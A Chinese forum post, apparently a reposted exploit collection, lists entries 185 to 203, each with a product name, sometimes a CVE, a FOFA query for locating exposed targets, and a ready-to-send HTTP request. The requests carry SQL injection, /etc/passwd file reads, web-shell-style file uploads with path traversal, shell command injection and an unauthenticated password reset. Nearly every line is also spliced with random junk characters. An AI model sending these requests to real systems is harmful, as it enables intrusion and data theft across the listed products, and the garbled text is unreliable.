8 b5 E& w/ D0 Z4 L& C6 NPOST /soap/AddUser HTTP/1.17 `9 b& W' l2 n7 e' o+ v9 v0 U
Host: your-ip
7 M/ ^, u# ]& a' S/ t4 pAccept-Encoding: gzip, deflate
( H+ L2 G% z7 m" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( _" A- y: t3 {+ ^; [Accept: application/xml, text/xml, */*; q=0.01
$ d+ {' ?" l; ^& _" ~. k; dContent-Type: text/xml; charset=utf-8; G- `9 g* x1 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! H) J$ n1 S! C8 Z8 }
X-Requested-With: XMLHttpRequest$ ?' p. k$ ]/ C2 f2 c0 |3 ^( L% K
0 ^7 F" l6 B2 J9 p+ E& ]) p' @( x& }
4 X8 v9 ]3 a/ P( y2 \3 n
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
# e/ r% W/ H. R( d% I: ]/ t) p2 f& [+ a" B; b+ l0 h' Y8 Z/ X) w

& d  R5 K. {1 {' m9 N# H185. 瑞友天翼应用虚拟化系统SQL注入, |; V0 |( F& z$ A
version < 7.0.5.1. k  F2 M: K9 ]1 M
FOFA:app="REALOR-天翼应用虚拟化系统"+ B- h  t$ ~9 Z7 J* S- L2 p2 Y
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
. e$ y' r& ~7 {; m  FHost: host
, p! F" U. q+ p1 n1 |4 h% _: l7 L" T! L2 U

( ^& K, z/ [( |2 C" A( ^% h  T186. F-logic DataCube3 SQL注入6 {6 j# \+ T. P4 y
CVE-2024-31750' ~3 h, M( p4 ?+ H
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统$ w8 A6 Q; h& S, `
FOFA:title=="DataCube3"
- _9 A1 h" s! E2 V- A' ^POST /admin/pr_monitor/getting_index_data.php HTTP/1.1( a5 P/ e) X, s7 R
Host: your-ip
0 H  d5 T1 d# D; [2 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
2 i3 h; T0 r, L2 C) c7 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
& a. F* S. x; B, {- M. K8 g8 Q6 Q! u% `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) V) Q1 ]3 N/ L5 a% C8 \
Accept-Encoding: gzip, deflate
. u: R: N" a9 B9 bConnection: close! x6 [7 m: F' x- f5 T; v  e
Content-Type: application/x-www-form-urlencoded
2 q- C" ^- Z& J$ J: ?: z9 {7 G7 B6 Q4 V) v* y/ ~, ]5 J% z% w2 b
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14506 K  B* i7 _; c1 L% }* K

1 [! V- N% y' g2 S( r
  C) \2 Z$ A# l* _187. Mura CMS processAsyncObject SQL注入- I8 j& ^+ t4 E' q- z
CVE-2024-326404 s2 t9 x, g+ Z' t  \+ C
FOFA:"Mura CMS"
) L) L  s# M# p/ D; J# RPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% L1 D( i' a& x7 V/ Z4 gHost: your-ip
- E( S, X5 J/ y3 `- YContent-Type: application/x-www-form-urlencoded( X$ P* o+ E; |9 ]' l* ~. C" K3 `

0 _/ M* ~# v3 V$ l; c
% k( n" E; \& X2 l2 V' a3 j& b1 ], c/ b7 Robject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1% }. [8 x) v+ w

# O" g' \5 u, p+ c" y2 z- e8 K8 w4 X& N  f
188. 叁体-佳会视频会议 attachment 任意文件读取5 |" t: N: G! s% I5 \
version <= 3.9.73 w+ B/ j; k* S9 \, m( a! F! b
FOFA:body="/system/get_rtc_user_defined_info?site_id"
7 S# _5 C( c" o0 [2 D. K; N9 CGET /attachment?file=/etc/passwd HTTP/1.1* D: U8 e) _/ [
Host: your-ip
, d- y! c- w4 [" `, M5 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 V- k8 a1 R, S0 N7 R7 q3 I0 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# L3 d0 F  p% C8 G+ I2 OAccept-Encoding: gzip, deflate8 b, {; [# H+ q  o5 n8 J: F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' p" F5 ?! e9 }& ~8 lConnection: close- t8 V9 M: y: {1 V: [  U$ e
/ l$ }7 v  y8 ]" x
3 h% y9 L( }! ~% M6 ?" d# I# Z
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
. h3 N4 ?" J4 `  U7 }2 ^FOFA:app="LANWON-临床浏览系统"+ C+ B& `9 _' ~0 t6 n3 M
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1( M: Y. I7 ^/ q$ B6 Q. n& T
Host: your-ip
6 _$ m; L6 g6 N) _* aUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 c: j' p. c( S0 U5 F# B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 {, e' ^8 v& b. h! L! p3 x# Q  T
Accept-Encoding: gzip, deflate- S% {  `( R2 ]1 o
Accept-Language: zh-CN,zh;q=0.95 Z( ^# n5 d1 ~8 O* c2 u/ w
Connection: close
* l  C! `% P9 ~+ j$ ^* Z0 W: S4 d
. r0 _: }+ W. y& e# ~5 G# C& Y- E( `1 |7 |: x
190. 短视频矩阵营销系统 poihuoqu 任意文件读取! m2 `; H* _% _' p- `
FOFA:title=="短视频矩阵营销系统"
2 S) |  P% c& MPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
) d3 P2 ~& D4 o; x& F# N, JHost: your-ip
7 p  P* a; d  }9 {- I4 k# ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
' q. _$ E7 ?- }0 ^) Z0 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) P  y6 N( D+ s7 |, A5 |) JContent-Type: application/x-www-form-urlencoded
* [8 R$ m( Y8 ^8 B' e' nAccept-Encoding: gzip, deflate
5 G8 @  T* V6 F0 f) ?, l9 D% eAccept-Language: zh-CN,zh;q=0.9' q% V! }" x/ f' K! m5 P" r& G
, C' Z- @9 I& C3 J
poi=file:///etc/passwd
; f3 U3 S6 O" T! D7 I, j# Q5 ]7 y0 B4 l! r% O
& v8 C, H8 w; C) ~6 Q; l3 K2 x& L
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
7 R9 ~' y" @9 t/ VFOFA:body="/CDGServer3/index.jsp"
! R7 m) }6 {' Z* q# ^/ F: O" PPOST /CDGServer3/js/../NavigationAjax HTTP/1.10 Z+ B2 ~$ y: `8 k# `
Host: your-ip
  G9 R( _1 X5 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" L4 c/ G0 ~, s9 C/ FContent-Type: application/x-www-form-urlencoded
$ O! n$ K9 B' C1 N% o" |$ z( {3 ~" T1 o! h" T7 y4 h% ?) M' }1 W
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=; M) v/ c2 |5 q, v5 W4 N( N

  _( s  r, Y) M+ d( |  O- h( `( d, }2 e: B$ M1 B4 m, d9 M
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传& f& o3 t0 {3 C: g* N% g
FOFA:title="用户登录_富通天下外贸ERP"
, h/ e5 u' W: y5 l6 ?POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
6 J7 W# q5 s* }/ y: F  X  Z3 G- qHost: your-ip
" ~0 F" Z  |  L/ @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; ]" I4 C/ a0 k) {" u) ~/ FContent-Type: application/x-www-form-urlencoded7 g" z: Z5 c: B$ a- p0 ]: i7 A

, m7 Q+ A( ^& V$ K, ^: @8 v5 w* n
) q- r6 T: S; C; S7 \+ i6 H<% @ webhandler language="C#" class="AverageHandler" %>" V- W& _5 l' H: l
using System;  X3 T9 d# M' y/ N6 u
using System.Web;9 a6 L  i3 [: K
public class AverageHandler : IHttpHandler
8 \3 a: V; ?: M' ^  s2 g( m! Z{
; E9 r( ~+ N" e* U% K! Fpublic bool IsReusable, k+ q) _7 V. ~3 T$ t% Q
{ get { return true; } }
+ h9 D6 F( F) z" A1 ~0 ipublic void ProcessRequest(HttpContext ctx)
3 a) l  Y0 W6 P$ q5 d" V' |  _) v* D{
2 F. c" |( i0 B# ]7 r0 l$ V4 Z; Xctx.Response.Write("test");" e% R7 I+ X6 b2 T
}
6 z* S; @' |( s) m# H  }}
7 ~' G, _8 I2 z5 Q# ~. u; N: B3 w! r
- F5 B! x4 v3 L
- W* \" p0 a) L+ `193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行) D+ {. A7 c; y& H* H9 m. k' z* O
FOFA:body="山石云鉴主机安全管理系统". G" X( h9 {4 {2 i6 k1 M% G) ?. S
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
0 I1 `, [6 f/ {  ]Host:  y! \1 H* e# S) ^  c* y
Cookie: PHPSESSID=2333333333333;
: s( ^, F+ h/ j+ _. I, L; t+ pContent-Type: application/x-www-form-urlencoded
; [2 S4 l( q! i. r7 l+ ]- ^0 E, JUser-Agent: Mozilla/5.0
/ `7 X  Z0 O6 |* t% H6 Y2 \9 N2 h3 K/ d3 |
5 N9 U, M9 @: V/ O' U. q" c
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
1 Z8 d' V% F0 d$ M- Y, vHost:
$ y7 y7 l/ r4 @' Z3 B' FUser-Agent: Mozilla/5.0; ^2 {+ r  q1 Z: a0 |
Accept-Encoding: gzip, deflate
6 G8 w& g/ J4 V, XAccept: */*& T2 Z, d* q8 a/ X) A* v- H
Connection: close
4 W7 s; _5 }3 B/ |/ ^' eCookie: PHPSESSID=2333333333333;
* _/ V! a4 S$ Y7 F  D$ pContent-Type: application/x-www-form-urlencoded
) x/ D2 }. T( w/ rContent-Length: 84" j4 t) q! X; Y. A

0 T% F5 n$ h3 I9 ^% m' `4 Dparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')2 N. e3 x5 x4 V. U; D

- I, B9 F3 \" M0 `' R
0 A8 t; D. w2 Q" ?: ~GET /master/img/config HTTP/1.1! [4 N9 h* B7 ]$ D" [) W- r
Host:
5 h* y" X' T# ~7 r3 AUser-Agent: Mozilla/5.0
# o# p7 ^: {- h5 J3 l
1 m) Q% S" b7 ]: A0 D5 ?2 Q- a6 a1 i+ V, }% E4 h: ^
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
! o  d& u* @8 k& p& Q7 x- H7 N" BFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
% T$ v# x4 e* N# g5 h* L
. k, ~# |9 c0 ]5 x$ N1 JPOST /servlet/uploadAttachmentServlet HTTP/1.1
9 S6 W$ a* L1 _; B; RHost: host
) S2 o+ T0 @3 B" C2 k# \) uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36& P$ d+ Q, h' R  W2 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! x1 I8 ?; l; @9 R1 h3 q/ I- X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# A; W6 F; Y0 O3 rAccept-Encoding: gzip, deflate" P( C. ?  h3 E7 Z* s5 {; x
Connection: close! s7 R) y& l, }) Q. c8 o" U' H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk2 Q1 C: k" }+ `: K, S; |
------WebKitFormBoundaryKNt0t4vBe8cX9rZk* k6 x) R4 G0 C3 D% v* R, t
. S& q# ?) k" |* k+ H
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
* p* n; a5 \/ U3 Y7 H( BContent-Type: text/plain
* I' w0 A; @/ a4 p" ~<% out.println("hello");%>. F7 S+ E: M: |- p
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
8 J1 A  b7 s' e+ t1 XContent-Disposition: form-data; name="json"0 K5 y) o; V& w8 P" a
{"iq":{"query":{"UpdateType":"mail"}}}9 u4 k" h5 F5 e% S/ t# U2 [' F
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
. p1 |4 D2 E# Q/ j
2 u- X. W, A, h% p& I- x' J" M' i$ `0 L' h6 i+ |
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行/ X( U8 ^% z8 ^; {! f: L
FOFA:title=="飞鱼星企业级智能上网行为管理系统0 C' g3 q2 G. E' S
POST /send_order.cgi?parameter=operation HTTP/1.1
" e- B  o' M& ~0 t* \5 H# U+ {Host: 127.0.0.1: H6 W, l: P( V# q0 g+ ~  A6 v
Pragma: no-cache0 m8 W6 j4 d( P! p4 Z3 _) G8 S
Cache-Control: no-cache5 Z. r# S3 M0 W! I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, p" `% m0 @& U# h8 y# HAccept: */*
1 `1 w" o- B! ^+ s. C- x0 lAccept-Encoding: gzip, deflate
6 {" b# K- H% @# B& ~Accept-Language: zh-CN,zh;q=0.9
( s& s& ^1 [0 v1 |. gConnection: close+ W/ B4 G5 N* d& c+ P; t
Content-Type: application/x-www-form-urlencoded
5 v. T+ K& z- k( t) _Content-Length: 68$ w# I& g; n1 P, J

8 X( ?6 u: z2 w' u* k{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}  h8 V, x1 b9 g8 }+ S& S0 E

  n$ c1 m% h3 i; n6 }; G# n1 V% H; k* v* f, W: {4 c& e
196. 河南省风速科技统一认证平台密码重置  m0 V- P& K) s7 `5 y# [
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"/ F1 |* k4 c6 O" \" {2 s
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1% P$ j* T0 S/ S/ J7 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ _/ X' M7 X( _" |4 y3 S
Content-Type: application/json;charset=UTF-8# m& b! r7 C: `, X) f; {7 U
X-Requested-With: XMLHttpRequest
5 y8 C" l9 k8 o0 n% A0 mHost:
% F" W. ~! C6 O+ n9 iAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
4 V/ ^9 }6 b( Q5 Q5 _Content-Length: 45# C; |" H2 @0 A4 a
Connection: close
$ a1 Q1 E9 v: E+ T; Q. g2 V1 p
& [. D8 ]& [2 A3 j{"xgh":"test","newPass":"test666","email":""}
& B$ W) v! D5 }
) g; u7 ^8 M% U9 y1 j% R0 V/ y
& _6 F8 ~. u" G& D0 d
' U! @$ p. W! `# u/ @197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入* Y8 w' {- a% v/ H% l2 j
FOFA:app="浙大恩特客户资源管理系统"4 ^) @6 N2 n% ]* F
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1; m5 G/ t: z) p
Host:& L$ `8 v# T6 {. Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
' R0 W7 m- C  ]4 c( R- z* TAccept-Encoding: gzip, deflate  j" L: l& P1 l$ p$ G; H
Connection: close
9 X: R6 ~5 q) _" u/ D& k5 l3 `& q0 ^

2 D- q2 E6 X$ P, y- @% P* U4 R+ d3 K( J' G! A& w9 ]* f
198.  阿里云盘 WebDAV 命令注入1 L; J5 r2 r3 X
CVE-2024-29640
8 w8 c  N4 b' l9 \. UGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
. C. t1 ^/ P1 C6 u7 E) \+ }Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64" a% Y$ j* ~% i4 r0 Z
Accept: */*7 f; b" K8 J  A1 w+ w2 a+ e0 e! a# m
Accept-Encoding: gzip, deflate* ~6 H! m6 a& E6 o) f, ~1 P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
& w. E: E1 @* g8 I0 y6 m1 IConnection: close. y8 k, [+ t% F' N) _. D$ @7 u0 A

3 K/ a# s- Z  I/ m$ |4 D
1 t* ~4 g% x% z; E" I/ e199. cockpit系统assetsmanager_upload接口 文件上传
: ]& ~: Q8 ]5 k$ R# ^& B8 h; _& S- x( R! }3 ~1 E) X; G& \
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
; }; V8 l" r# s: e& ?GET /auth/login?to=/ HTTP/1.1
: s1 g9 y1 H$ a* s) G3 D% D
; f% o! A3 ^/ b响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
! f$ L, p" D/ X5 c. }" h- m) @& m' G. k- U# r" y! T' E
2.使用刚才上一步获取到的jwt获取cookie:
6 U1 Z* K" ~% w) j4 L6 f1 @. P6 }8 j) U! R
POST /auth/check HTTP/1.1* d  X8 S  T3 t2 X! |
Content-Type: application/json0 j+ R! M  U, K4 V* K9 l; S% D

& x; q# n7 Z9 Y- h{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}" c& G% {% r3 W0 ]# b) T7 b# D

9 ~) v3 u% P$ \1 X, B: q响应:200,返回值:4 N+ w" {1 M$ G4 ~1 U4 z8 u7 Y
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
; B4 Q6 x" J# m' u/ O# GFofa:title="Authenticate Please!"
3 v) F/ e4 V0 m) _0 ^( e( z( pPOST /assetsmanager/upload HTTP/1.1
) d" C) G! C% i3 W/ q! |Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
$ c/ G; L, P0 j5 C& e; r! d  oCookie: mysession=95524f01e238bf51bb60d77ede3bea92
' N5 p9 o' R" X$ [# p& b) n; @9 e1 L( o9 |
-----------------------------36D28FBc36bd6feE7Fb3
- O' K5 D& M: g0 G4 Y( ]& ~Content-Disposition: form-data; name="files[]"; filename="tttt.php"
, F: s- i4 Q  W" t, wContent-Type: text/php$ r. Z  |) c5 C( ^( _9 s3 P

4 P! g& Q5 V# L1 c" E: H<?php echo "tttt";unlink(__FILE__);?>! v4 H  V9 h' R1 n/ w% H% K+ Y
-----------------------------36D28FBc36bd6feE7Fb3
9 ]5 d8 s* y7 I5 {/ pContent-Disposition: form-data; name="folder"$ }% E' c) o6 Y! O+ _' t
" o+ v9 c" G9 H& k
-----------------------------36D28FBc36bd6feE7Fb3--  c) E- _- U5 z6 W$ |6 K1 d

' e7 x1 t0 e0 a9 |9 T& c+ E5 a/ B9 Z, b) x
/storage/uploads/tttt.php
3 Z2 H# b3 L* j( q3 H( m  @! n3 B' y7 D) t7 `' g
200. SeaCMS海洋影视管理系统dmku SQL注入9 L4 u9 R8 c' _8 r
FOFA:app="海洋CMS"
: G$ D4 L5 |; s$ LGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
; X* T( \' O$ n* D5 @; \' I& ~Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
/ O$ O4 J1 a) a  qUpgrade-Insecure-Requests: 1+ U+ J8 S* \& L) h* r. o
Cache-Control: max-age=0) f5 L# W, j( ?! _" e" V" @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* h- M- T' p/ m% W4 _6 MAccept-Encoding: gzip, deflate
' f% v5 W0 O$ V, s& d* GAccept-Language: zh-CN,zh;q=0.98 q  U6 v1 \7 G, _! q& R: c
) S' q1 `8 \; f- F6 ^

0 |0 H) a/ c  J+ h2 _# A/ D201. 方正全媒体新闻采编系统 binary SQL注入
% `/ B( x! O$ u: UFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
, ~$ v3 G1 [7 P" N6 UPOST /newsedit/newsplan/task/binary.do HTTP/1.1, F7 V3 L% [5 o8 x2 e
Content-Type: application/x-www-form-urlencoded
' F/ ~7 Q: g$ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* H% C' C( M! O2 _( b: zAccept-Encoding: gzip, deflate
9 F; I+ g/ }% P4 OAccept-Language: zh-CN,zh;q=0.9
+ V* B, P' L3 L; a8 H  q9 V7 YConnection: close3 n& `* _0 M) ~( \

" \. K7 p) E% L( W1 lTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1. b3 l" [* G) d, `. m4 N
' c6 F5 ]& T6 f. F7 x" p
2 |& C: \' m/ }3 |: s: m- `* S9 p% r- Y
202. 微擎系统 AccountEdit任意文件上传& G( n4 D6 O) {2 ?7 ]: y! l
FOFA:body="/Widgets/WidgetCollection/"
: m. I* f( p+ Y5 A, }! @! C: R; ]获取__VIEWSTATE和__EVENTVALIDATION值
/ q4 Q2 G' j/ j/ P% wGET /User/AccountEdit.aspx HTTP/1.1
$ C. N9 J1 [, ^. ^Host: 滑板人之家
4 N2 S+ ?) p4 W* g) n+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31- ^" u" u- \/ _! c2 u- y
Content-Length: 0
% S- ~- Z% [+ M' }+ x; y
, h! Y. f; l3 R: k, |. R* L2 a' d3 e: J' ]4 x7 L! d* t2 [
替换__VIEWSTATE和__EVENTVALIDATION值- P) |. c5 i) Z8 ^
POST /User/AccountEdit.aspx HTTP/1.1
9 v" Y( w* a) B# `# |. I3 QAccept-Encoding: gzip, deflate, br; r! Y2 Y7 E2 i
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
- s- Y. W% H8 `
  j, A& k, @# Y-----------------------------786435874t38587593865736587346567358735687
$ J( ?% C2 n4 p) m5 _8 H* \. [! lContent-Disposition: form-data; name="__VIEWSTATE"  j& g' }! O6 S3 U% E  q7 \
0 T0 I0 B5 d7 u/ P
__VIEWSTATE. k8 n& }. A4 X: `5 \/ R4 }& l4 Y
-----------------------------786435874t38587593865736587346567358735687
7 \; @& I; d! f3 y( S& rContent-Disposition: form-data; name="__EVENTVALIDATION"# l: s1 H: w; F* l, Y0 R/ x
& T: ]  q4 g3 C" Q% M( t) C. c
__EVENTVALIDATION
1 k' P$ v. B, r; w: s-----------------------------786435874t38587593865736587346567358735687
8 F$ Z7 @2 U! _+ YContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
: S+ o) w! f: N: qContent-Type: text/plain
* H1 c& s6 K: D" ^* P; m; m) n2 [; i" H/ ^6 _! x
Hello World!4 a$ z# @2 U0 D3 X3 j' u$ A3 ^
-----------------------------786435874t38587593865736587346567358735687
/ R* E/ P) D- o& o+ m7 }0 EContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"+ o- x0 |) l+ E; ^
- \' Y  m8 `' L' |3 w" C
上传图片! B: Q7 i2 k. ?' B$ i
-----------------------------786435874t38587593865736587346567358735687
9 o# Y7 J* K8 z- \; iContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"- x+ c" @# @  l& U  `0 R0 m
' u+ B) n( j' j. E4 y7 S- Z: ~
& s% `2 U' ?2 R4 a4 s
-----------------------------786435874t38587593865736587346567358735687' p+ _3 P1 x, e7 w
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
. i, Z: ~. l. \4 |8 A+ j% h0 B
) _( J0 A0 [( f) \
! H9 Q' Y$ M& ^; n! s: D1 R2 m-----------------------------786435874t38587593865736587346567358735687--
/ o$ f- y6 w3 \/ y: g( r' Y
2 x" R! n5 h' ]4 O8 j& g$ d% M7 R# c" t2 G# }
/_data/Uploads/1123.txt) d" u; W! J6 \0 r

2 C. @* o( X! J203. 红海云EHR PtFjk 文件上传. ?1 O3 I( E  r" F
FOFA:body="RedseaPlatform"( p+ a2 W% I4 d
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1$ P2 ?3 o3 U3 [$ I  Z- w9 G, O
Host: x.x.x.x
; Q" t! ^( @: ]& D" WAccept-Encoding: gzip
, n' U% c" g3 b  r/ c' eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 W$ a2 v- a# F" ~1 a  Y; `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
: X" j7 r) ]8 C. I7 z$ h! m" QContent-Length: 210
. X" M! G) ~, K$ d" ]+ P+ d" y& h2 z# e6 Z/ [% B2 W* b, D
------WebKitFormBoundaryt7WbDl1tXogoZys4) o: I, U' X; {) p, k0 t
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
) P: C) c7 m+ i6 x" a7 ?Content-Type:image/jpeg' u$ A! r. \( z/ a
9 D1 ]3 d6 a5 p
<% out.print("hello,eHR");%>" q+ ?& q. x$ G0 D" Z
------WebKitFormBoundaryt7WbDl1tXogoZys4--
2 i- [! z. x- w' d* q6 ^
0 H% l- r& k9 s: s$ c1 A' R# @ / G3 ]" k! ?4 t
' m0 }- ]1 H# \9 k7 C2 \' j* I

4 B. S1 V' E& G: d9 i, d" i1 n! [
" v  o) Q. a; {& T7 ~; S" \0 N5 n6 n/ f4 p. s: j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表